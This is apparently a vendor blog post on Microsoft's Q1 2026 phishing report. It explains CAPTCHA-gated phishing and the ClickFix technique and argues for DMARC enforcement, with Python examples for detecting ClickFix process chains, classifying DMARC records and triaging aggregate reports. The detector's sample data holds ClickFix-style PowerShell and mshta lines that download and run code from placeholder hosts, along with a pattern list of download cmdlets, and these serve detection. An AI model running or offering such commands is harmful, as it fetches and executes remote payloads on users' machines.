By Excello Mail Team

8.3 Billion Phishing Threats in Q1 2026: Why CAPTCHA-Gated Attacks and ClickFix Are Reshaping the Email Security Equation

Microsoft's Q1 2026 Email Threat Landscape Report tracked 8.3 billion phishing attempts in three months. CAPTCHA-gated phishing jumped 125% in March, and ClickFix attacks turn victims into unwitting malware installers. Here is where DMARC enforcement fits in a threat landscape evolving faster than most defenses.

Microsoft Threat Intelligence published its Q1 2026 Email Threat Landscape Report in late April, and the headline figure is difficult to absorb: 8.3 billion email-based phishing threats detected in the first three months of 2026. That is roughly 92 million per day, every day of the quarter. The raw volume matters less than what the report reveals about how those threats are being delivered and why the delivery methods are changing so rapidly.

Two trends in the report deserve particular attention from security teams and IT administrators: the explosive growth in CAPTCHA-gated phishing, and the rise of a social engineering technique called ClickFix that removes the need for file downloads entirely by turning the victim into the final delivery mechanism.

What CAPTCHA-Gated Phishing Actually Does

CAPTCHA-gated phishing is not new, but its March 2026 numbers are striking. After declining in January and February, the volume of CAPTCHA-gated attacks more than doubled in March, reaching 11.9 million. That is the highest monthly volume Microsoft has observed in over a year, representing a 125% increase in a single month.

The technique works by placing a real CAPTCHA challenge in front of the credential-harvesting page. This is not for the benefit of the victim: it is explicitly designed to block the automated scanning tools that security vendors use to identify and blacklist phishing sites. When a scanner visits the URL and encounters the CAPTCHA, it cannot proceed to analyze the content. The phishing page behind it stays active longer, reaches more victims before detection, and generates more successful credential captures per campaign.

The delivery formats for CAPTCHA-gated content shifted sharply in March: PDF attachments quadrupled, HTML file usage nearly tripled, and DOC/DOCX delivery increased almost fivefold. The rapid experimentation across attachment types indicates that attackers were actively testing which formats produced the best combination of inbox placement and evasion longevity.

ClickFix: When the Victim Becomes the Delivery Mechanism

ClickFix borrows the CAPTCHA lure from the CAPTCHA-gating trend, but here the challenge is fake: it exists only to deliver instructions. It deserves separate attention because of how completely it sidesteps conventional email security, including DMARC.

In a ClickFix attack, the victim arrives at a web page, typically through a phishing link in an email or via a compromised site. The page displays what looks like a CAPTCHA verification or a browser security prompt and tells the user to complete verification by pressing Win+R, then Ctrl+V, then Enter. What the victim does not know is that the page's JavaScript wrote a malicious command to the clipboard the moment they clicked the fake "I'm not a robot" checkbox or "Verify" button (browsers only allow clipboard writes on a user gesture, which is why the click comes before the instructions). Following the instructions opens the Windows Run dialog, pastes the attacker's PowerShell or mshta command, and executes it. The pasted command is often padded with spaces so that only a harmless-looking comment, such as a fake verification ID, is visible in the narrow Run box, and variants use other launch points, such as the File Explorer address bar or a terminal, with the same sequence.

No download prompt appears and no attachment needs to be opened; to the user it is ordinary keyboard input. Endpoint tools never see a malicious file, but they do see the process chain: explorer.exe launching powershell.exe or mshta.exe from the Run dialog, usually with a command line that downloads and executes a remote payload, and the typed command is recorded under the user's RunMRU registry key. That is where detection has to happen, and it is where the "looks like normal input" advantage ends.
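The process chain described above is what a detection has to key on. The following is an added example, not code from the Microsoft report or this article: a small Python detector run over constructed process-creation events (Sysmon Event ID 1 style; the field names and the marker list are this example's own assumptions, not a vendor schema or a complete signature set). It alerts only when explorer.exe is the parent, the child is a binary that can run remote code, and the command line carries at least one ClickFix marker, and it applies the same markers to RunMRU values for after-the-fact forensics.

```python
"""Flag ClickFix-style process chains in process-creation telemetry.

Added example, not code from the Microsoft report or the original article.
The events below are constructed to resemble Sysmon Event ID 1 / EDR
process-creation records; the field names and the marker list are this
example's own assumptions, not a vendor's schema or a complete signature set.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    command_line: str   # command line as recorded by the sensor


# Binaries a user can launch from Win+R that will fetch or run remote code.
RUN_DIALOG_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "msiexec.exe"}

# Command-line markers seen in pasted ClickFix payloads (assumption: a starter
# list, to be tuned against your own telemetry).
MARKERS = [
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression|irm|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I), "download-and-run cmdlet"),
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"\bmshta(?:\.exe)?\s+(?:https?:|vbscript:|javascript:)", re.I), "mshta remote/script handler"),
    (re.compile(r"i am not a robot|recaptcha|verification id", re.I), "fake-CAPTCHA comment"),
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> dict:
    """Verdict for one event: {"alert": bool, "reasons": [marker labels]}.

    Two signals must coincide: the parent is explorer.exe (everything started
    from the Run dialog is a child of the shell) and the child is a binary that
    can run remote code with a command line carrying at least one marker.
    A bare explorer.exe -> cmd.exe with no markers is an admin opening a prompt.
    """
    if basename(ev.parent_image) != "explorer.exe" or basename(ev.image) not in RUN_DIALOG_CHILDREN:
        return {"alert": False, "reasons": []}
    reasons = [label for pattern, label in MARKERS if pattern.search(ev.command_line)]
    return {"alert": bool(reasons), "reasons": reasons}


def scan(events):
    """Indexes of alerting events with their reasons."""
    return [(i, score_event(e)["reasons"]) for i, e in enumerate(events) if score_event(e)["alert"]]


def score_runmru(values: dict) -> list:
    """Same markers applied to HKCU\\...\\Explorer\\RunMRU values for forensics.

    Windows records each Run-dialog entry as a value like "a" = "<command>\\1";
    the MRUList value orders them. Returns the commands that match a marker.
    """
    hits = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        if any(p.search(cmd) for p, _ in MARKERS):
            hits.append(cmd)
    return hits


# Constructed sample events: two ClickFix chains, three benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"iex (irm https://verify-captcha.example/p.ps1)\" "
              "# I am not a robot - reCAPTCHA Verification ID: 9312"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://cdn-check.example/x.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(r"C:\Program Files\Vendor\agent.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

# Constructed RunMRU values as they would be read from the user's hive.
SAMPLE_RUNMRU = {
    "a": "powershell -w hidden -c \"iex (irm https://verify-captcha.example/p.ps1)\"\\1",
    "b": "mstsc\\1",
    "MRUList": "ab",
}

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: ClickFix pattern ({', '.join(reasons)})")
    for cmd in score_runmru(SAMPLE_RUNMRU):
        print("RunMRU:", cmd)
```

The parent check is what keeps the false-positive rate tolerable: PowerShell with a hidden window and a remote URL is common in management tooling, but that tooling is not launched by explorer.exe from the Run dialog. Expect to extend the child set and markers for your environment, and to correlate with the browser process that was in the foreground just before the chain.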

ClickFix matters for email security specifically because the initial delivery of the phishing link can pass every authentication check. The email carrying the link may come from a properly authenticated sender, pass SPF and DKIM, and satisfy DMARC alignment. The attack does not spoof a domain; it uses legitimate delivery infrastructure to route a victim to an attacker-controlled page. DMARC enforcement on the sending domain does nothing to prevent this.

What DMARC Does and Does Not Address

Reading the Q1 report, it would be easy to conclude that DMARC is losing relevance as attackers pivot to post-delivery techniques. That conclusion is wrong, but the reasoning behind it is worth working through.

DMARC enforcement at p=reject stops one specific threat: unauthorized use of your exact domain in the From header of messages you did not send. When an attacker puts your domain in the From header of a phishing campaign against your customers, vendors, or partners, any receiver that evaluates DMARC rejects the message before it reaches an inbox. Two limits apply: the policy only bites at receivers that check it (most large mailbox providers do), and a lookalike domain the attacker registers is a different domain with its own policy, so DMARC on your domain says nothing about it.

That protection is distinct from what ClickFix or CAPTCHA-gated phishing exploit. Those attacks typically operate from attacker-controlled infrastructure, not from spoofed sender domains. They do not need your domain to succeed.

Lacking DMARC enforcement does not make an organization any better off against ClickFix; it simply leaves both vectors open: direct spoofing of the domain identity, and post-delivery social engineering. Enforcement closes one of the two. That is not a minor gain in a threat environment generating 8.3 billion attacks per quarter.

The EasyDMARC 2026 DMARC Adoption Report provides the current baseline. Of the top 1.8 million domains analyzed, 52.1% have a DMARC record in place, but only around 9% combine an enforcement-level policy with aggregate reporting (a rua address), the configuration required to both block spoofing and keep visibility. A domain at p=none with a rua address is collecting data about spoofing attempts but blocking nothing; a domain at p=none without one is doing neither.
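The distinction the adoption figures draw (record present, enforcement, reporting) comes straight out of the tags in the DNS TXT record, along with two caveats that quietly weaken an "enforcement" record: pct below 100 and sp=none. The following is an added example, not code from EasyDMARC, Microsoft, or this article: a Python parser and classifier for DMARC records that applies RFC 7489 defaults and shows what a receiver actually does with a failing message. The sample records are constructed and the category names are this example's own.

```python
"""Parse a DMARC TXT record and classify it the way adoption surveys do.

Added example; not code from EasyDMARC, Microsoft, or the original article.
The records below are constructed and the category names are this example's
own. Tag semantics follow RFC 7489: 'v=DMARC1' must be the first tag, 'p' is
required, 'sp' defaults to 'p', 'pct' defaults to 100, and 'rua' names where
aggregate reports go.
"""
from collections import Counter

POLICIES = ("none", "quarantine", "reject")


def parse_dmarc(txt: str) -> dict:
    """Split 'v=DMARC1; p=reject; rua=mailto:...' into a tag dict.

    Returns {} for anything that is not a usable DMARC record (wrong or
    misplaced version tag, missing or unknown p), so callers treat it the
    same as 'no record': receivers ignore such records entirely.
    """
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    if not txt.strip().lower().startswith("v=dmarc1"):
        return {}
    if tags.get("p", "").lower() not in POLICIES:
        return {}
    return tags


def _pct(tags: dict) -> int:
    try:
        return int(tags.get("pct", "100"))
    except ValueError:
        return 100


def classify(txt: str) -> dict:
    """Category for the record plus caveats that weaken an enforcement policy."""
    tags = parse_dmarc(txt)
    if not tags:
        return {"category": "no valid record", "caveats": []}
    p = tags["p"].lower()
    sp = tags.get("sp", p).lower()       # subdomain policy defaults to p
    pct = _pct(tags)                     # share of failing mail the policy applies to
    reporting = "rua" in tags            # aggregate reports give the visibility
    enforcing = p in ("quarantine", "reject")
    caveats = []
    if enforcing and pct < 100:
        caveats.append(f"pct={pct}: only {pct}% of failing mail gets the policy")
    if enforcing and sp == "none":
        caveats.append("sp=none: subdomains stay unenforced")
    if enforcing:
        category = "enforcement with reporting" if reporting else "enforcement without reporting"
    else:
        category = "monitor only (p=none)" if reporting else "p=none without reporting"
    return {"category": category, "caveats": caveats}


def effective_policy(txt: str, from_subdomain: bool = False) -> str:
    """Policy a receiver applies to a message that fails DMARC under this record.

    With pct < 100, RFC 7489 has the receiver apply the published policy to
    that share of failing messages and the next weaker policy to the rest;
    the return value names both so the weakening is visible.
    """
    tags = parse_dmarc(txt)
    if not tags:
        return "none (no valid record)"
    p = tags["p"].lower()
    policy = tags.get("sp", p).lower() if from_subdomain else p
    if policy not in POLICIES:
        policy = p
    pct = _pct(tags)
    if pct >= 100 or policy == "none":
        return policy
    weaker = POLICIES[POLICIES.index(policy) - 1]
    return f"{policy} for {pct}% of failing mail, {weaker} for the rest"


def summarize(records: list) -> Counter:
    """Count categories across a set of records, as an adoption survey would."""
    return Counter(classify(r)["category"] for r in records)


# Constructed records covering the cases the adoption figures distinguish.
SAMPLE_RECORDS = [
    "v=DMARC1; p=reject; rua=mailto:dmarc@example.com",
    "v=DMARC1; p=quarantine; pct=10; sp=none; adkim=s",
    "v=DMARC1; p=none; rua=mailto:dmarc@example.com",
    "v=DMARC1; p=none",
    "p=reject; v=DMARC1",              # version tag not first: receivers ignore it
    "v=spf1 include:_spf.example.com -all",
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(f"{rec!r:55} -> {classify(rec)}")
    print(summarize(SAMPLE_RECORDS))
```

The second sample record is the one to watch for in your own zone: it reads as "enforcement" in any survey, yet a receiver applies quarantine to only a tenth of failing mail and nothing at all to subdomains.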

Business Email Compromise Adds Context

Microsoft tracked 10.7 million Business Email Compromise (BEC) attacks in Q1. Between 82% and 84% of initial contact emails in BEC campaigns used generic rapport-building messages rather than immediate financial requests. Attackers are patient: they establish trust first, then introduce the fraudulent wire transfer or gift card request later.

BEC depends on convincing impersonation of an identity. When attackers spoof the exact email address of a CFO, a vendor, or a known business contact, DMARC enforcement on the impersonated domain (your own for the CFO, the vendor's for the vendor) makes that direct spoofing significantly harder, provided the receiving mail server honors the policy. Not impossible, because lookalike domains and compromised legitimate mailboxes fall outside DMARC's scope, but substantially harder than impersonating a domain with no enforcement at all.

Three Actions the Q1 Data Supports

1. Move to enforcement. The Q1 volume data is a clear argument against treating p=none as an acceptable resting state. The threat environment is not improving. Publish p=quarantine once aggregate reports confirm that every legitimate sending source passes SPF or DKIM in alignment with your domain (pct can stage the rollout if needed), then escalate to p=reject, and check that sp is not left weaker than p so subdomains do not stay exposed. Each step materially reduces the attack surface for BEC and spoofing campaigns.

2. Review aggregate reports for undiscovered senders. The most common reason organizations stall at p=none is legitimate sending sources they did not know about: CRM platforms, marketing tools, transactional email services, and third-party integrations that send on behalf of the domain without aligned DKIM or SPF. Aggregate reports list every source IP that reporting receivers saw using your domain, with its SPF and DKIM results, so a systematic review resolves the authentication gaps that make enforcement risky. Sort by volume, identify each failing source, and fix it by adding an aligned DKIM signature or a custom return-path domain before moving the policy.

3. Brief your team on ClickFix patterns. DMARC and email authentication cannot stop ClickFix because it operates after delivery. Security awareness training that specifically describes the Win+R, Ctrl+V pattern, and that tells users no legitimate site will ever ask them to paste commands into the Run dialog, a terminal, or the File Explorer address bar, is a direct countermeasure. Pair it with the technical controls that do apply after the click: restricting the Run dialog by policy where the business can tolerate it, and an endpoint detection for explorer.exe launching PowerShell or mshta with a download-and-execute command line.
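Step 2 is the part of this procedure that is worth automating. The following is an added example, not code from this article or any DMARC vendor: a Python script that parses a constructed aggregate report in the RFC 7489 Appendix C layout (documentation IP ranges, placeholder domains) and separates the sources that would be blocked at enforcement into the two cases that matter, a third-party service sending with its own SPF domain, and a source that fails everything.

```python
"""Find unauthenticated sending sources in a DMARC aggregate (RUA) report.

Added example; not code from the original article or any DMARC vendor. The
XML below is a constructed report in the RFC 7489 Appendix C layout, using
documentation IP ranges and placeholder domains, with the three cases that
matter before moving to enforcement: an aligned sender, a third-party service
sending with its own SPF domain, and a source failing everything.
"""
import xml.etree.ElementTree as ET

SAMPLE_RUA = """<feedback>
  <report_metadata><org_name>receiver.example</org_name><report_id>12345</report_id>
    <date_range><begin>1775001600</begin><end>1775088000</end></date_range></report_metadata>
  <policy_published><domain>example.com</domain><adkim>r</adkim><aspf>r</aspf>
    <p>none</p><sp>none</sp><pct>100</pct></policy_published>
  <record>
    <row><source_ip>192.0.2.10</source_ip><count>1200</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated></row>
    <identifiers><header_from>example.com</header_from></identifiers>
    <auth_results><dkim><domain>example.com</domain><result>pass</result></dkim>
      <spf><domain>example.com</domain><result>pass</result></spf></auth_results>
  </record>
  <record>
    <row><source_ip>198.51.100.7</source_ip><count>340</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>example.com</header_from></identifiers>
    <auth_results><spf><domain>bounce.crm-mailer.example</domain><result>pass</result></spf></auth_results>
  </record>
  <record>
    <row><source_ip>203.0.113.99</source_ip><count>18</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>example.com</header_from></identifiers>
    <auth_results><spf><domain>example.com</domain><result>fail</result></spf></auth_results>
  </record>
</feedback>"""


def parse_rua(xml_text: str) -> list:
    """One dict per <record>: source, volume, aligned results, raw SPF.

    <policy_evaluated> holds the aligned results the receiver used for the
    DMARC verdict; <auth_results> holds the raw checks, including an SPF pass
    for some other domain, which is the signature of an undiscovered sender.
    """
    root = ET.fromstring(xml_text)
    policy_domain = root.findtext("policy_published/domain")
    rows = []
    for rec in root.findall("record"):
        rows.append({
            "source_ip": rec.findtext("row/source_ip"),
            "count": int(rec.findtext("row/count")),
            "header_from": rec.findtext("identifiers/header_from"),
            "dkim_aligned": rec.findtext("row/policy_evaluated/dkim") == "pass",
            "spf_aligned": rec.findtext("row/policy_evaluated/spf") == "pass",
            "spf_domain": rec.findtext("auth_results/spf/domain"),
            "spf_raw": rec.findtext("auth_results/spf/result"),
            "policy_domain": policy_domain,
        })
    return rows


def triage(rows: list) -> list:
    """Sources that would be quarantined or rejected at enforcement, with a hint.

    DMARC passes when either aligned identifier passes. A source failing both
    is either a spoofer or a legitimate service that sends with its own
    envelope domain and no DKIM key for yours; an SPF pass for an unrelated
    domain separates the two cases well enough to prioritize the review.
    """
    out = []
    for r in rows:
        if r["dkim_aligned"] or r["spf_aligned"]:
            continue
        if r["spf_raw"] == "pass" and r["spf_domain"] != r["policy_domain"]:
            hint = (f"likely third-party sender: SPF passes for {r['spf_domain']}; "
                    f"add an aligned DKIM signature or a custom return-path for {r['policy_domain']}")
        else:
            hint = "no aligned pass and no third-party SPF pass: likely spoofing, verify before allowlisting"
        out.append({"source_ip": r["source_ip"], "count": r["count"], "hint": hint})
    return sorted(out, key=lambda x: x["count"], reverse=True)


def pass_rate(rows: list) -> float:
    """Share of reported messages that passed DMARC (aligned SPF or DKIM)."""
    total = sum(r["count"] for r in rows)
    passed = sum(r["count"] for r in rows if r["dkim_aligned"] or r["spf_aligned"])
    return passed / total if total else 0.0


if __name__ == "__main__":
    rows = parse_rua(SAMPLE_RUA)
    print(f"DMARC pass rate: {pass_rate(rows):.1%}")
    for item in triage(rows):
        print(f"{item['source_ip']:>15}  {item['count']:>5}  {item['hint']}")
```

Real reports arrive as gzip or zip attachments to the rua address, one per receiver per day, so the practical workflow is to unpack them, feed each file to parse_rua, and aggregate the rows by source IP across receivers before triage; the 340-message CRM in the sample is exactly the sender that stalls an enforcement rollout when it is discovered after the policy change rather than before.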

Tycoon2FA: What Platform Disruption Tells Us

The Tycoon2FA platform powered more than three-quarters of CAPTCHA-gated phishing sites at the end of 2025. Microsoft's March 2026 disruption operation reduced associated email volume by 15% for the remainder of the month and cut access to active phishing pages. Within weeks, Tycoon2FA had shifted hosting providers, and by late March, 41% of its active domains were under the .ru TLD.

Platform disruptions matter, but they do not replace structural defenses. Attackers adapt. Organizations that wait for infrastructure takedowns as their primary protection strategy will find themselves repeatedly racing an adversary with faster adaptation cycles. DMARC enforcement, SPF hygiene, and continuous aggregate report monitoring are structural controls that impose permanent costs on attackers attempting to abuse domain identity, regardless of which platform or toolkit they use.

The Q1 2026 data makes one thing clear: the complexity and volume of email-based threats are not decreasing. The organizations best positioned to weather this environment are those that have closed the baseline spoofing vector with DMARC enforcement and are using aggregate reporting to maintain ongoing visibility into how their domain identity is being used.


Your DMARC configuration is the foundation everything else builds on. If your policy is still p=none, Q2 is the time to change that. Start your free account at Excello and get to enforcement.